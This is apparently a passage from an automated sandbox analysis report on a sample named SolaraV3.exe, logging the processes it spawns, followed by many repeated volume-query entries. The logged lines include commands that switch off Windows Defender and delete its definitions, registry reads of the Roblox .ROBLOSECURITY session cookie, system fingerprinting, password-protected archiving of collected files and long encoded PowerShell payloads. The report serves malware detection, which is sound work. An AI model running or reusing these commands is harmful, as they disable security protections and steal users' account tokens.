NAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEBB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

110_2_00007FF74EEBB340

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC729570 cpuid

1_2_00007FF6DC729570

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe VolumeInformation	Jump to behavior
